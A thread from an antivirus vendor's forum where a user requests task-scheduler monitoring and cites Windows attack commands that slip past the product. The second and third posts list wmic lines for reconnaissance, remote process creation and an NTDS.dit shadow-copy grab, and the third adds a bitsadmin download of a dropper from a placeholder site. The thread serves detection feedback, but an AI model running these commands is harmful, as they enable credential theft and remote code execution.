Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

KATANA feature request

Started by sepik , May 11 2021 13:21

Please log in to reply

6 replies to this topic

#1 sepik

Newbie

Posters
5 Posts:

Posted 11 May 2021 - 13:21

Hello,

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries(allow, ask, block)?

I've been testing SS Beta several months against different kind of malwares and i really liked how Katana/DPD/DPH blocks some unknown malwares.

Of course, some unknown malware gets thru(i've submitted dozen of them to the virus lab), and some of them add task scheduler entry that calls undetected dropped files to %appdata% roaming dir.

So every time when the PC gets booted, malware can run its dropped files via task scheduler.

Regards,

-sepik

Back to top

#2 sepik

Newbie

Posters
5 Posts:

Posted 11 May 2021 - 16:46

Hello,

wmic useraccount get /ALL
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
wmic /node:"192.168.0.1" service where (caption like "%#{service_search_string} (%")
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
wmic process call create calc.exe
wmic /node:"192.168.0.1" process call create #{process_to_execute}
wmic /node:"192.168.0.1" process call create calc.exe
wmic.exe /NODE:*process call create*
wmic.exe /NODE:*path AntiVirusProduct get*
wmic.exe /NODE:*path FirewallProduct get*
WmiPrvSE.exe
wmic.exe /NODE: "192.168.0.1" process call create "*.exe"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM <path> ^> <path>"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"

To kill an av and any firewall product installed.

Seems that it creates "calc.exe" to gain system account, and when you have system priviliges, whole system is compromised.

Regards,

-sepik

Back to top

#3 sepik

Newbie

Posters
5 Posts:

Posted 11 May 2021 - 16:51

Hello,

wmic useraccount get /ALL
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
wmic /node:"192.168.0.1" service where (caption like "%#{service_search_string} (%")
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
wmic process call create calc.exe
wmic /node:"192.168.0.1" process call create #{process_to_execute}
wmic /node:"192.168.0.1" process call create calc.exe
wmic.exe /NODE:*process call create*
wmic.exe /NODE:*path AntiVirusProduct get*
wmic.exe /NODE:*path FirewallProduct get*
WmiPrvSE.exe
wmic.exe /NODE: "192.168.0.1" process call create "*.exe"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM <path> ^> <path>"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"

To kill an av and any firewall product installed.

Seems that it creates "calc.exe" to gain system account, and when you have system priviliges, whole system is compromised.

Also, as a signed MS component, bitsadmin.exe /transfer "DonwloadFile" http://www.mypage.com/%temp/mydropper.htmlgets thru too.

Regards,

-sepik

Back to top

#4 sepik

Newbie

Posters
5 Posts:

Posted 11 May 2021 - 17:18

Sorry Double-post.

-sepik

Back to top

#5 SergSG

The Master

Posters
14,425 Posts:

Posted 11 May 2021 - 17:54

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries(allow, ask, block)?

Of course, some unknown malware gets thru(i've submitted dozen of them to the virus lab), and some of them add task scheduler entry that calls undetected dropped files to %appdata% roaming dir.

So every time when the PC gets booted, malware can run its dropped files via task scheduler.

+1